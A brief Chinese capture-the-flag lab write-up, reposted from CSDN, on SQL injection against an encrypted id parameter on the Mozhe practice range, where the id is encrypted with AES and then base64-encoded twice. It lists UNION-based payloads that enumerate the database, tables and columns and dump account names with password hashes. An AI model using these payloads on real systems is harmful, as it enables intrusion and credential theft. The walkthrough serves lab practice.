SQL注入漏洞测试(参数加密)&墨者靶场

发现id后的解密数据

尝试解密,无法解密,可能是有多种加密方式组合或加salt

7Kbscan扫web目录

list.zip含有加密方式文件

了解函数作用,

加密原理:明文-->AES加密--> bsse64加密--->base64加密-->密文

解密ZUlJOGMzSmVMMHQwZHhNN3diM056Zz09

构建payload方式

后面的语句都按照上面的加密方式

查回显:-1 union select 1,2,3,4_mozhe

爆库:-1 union select 1,database(),version(),4_mozhe

爆表:-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup' limit 0,1_mozhe

爆列名:-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member' limit 0,1_mozhe

爆数据:-1 union select 1,group_concat(name,password),3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 0,1_mozhe

存储密码:形式来看,一般是md5加密

两个账号尝试登录

最下面有key

猜你喜欢

转载自blog.csdn.net/qq_63283137/article/details/127181141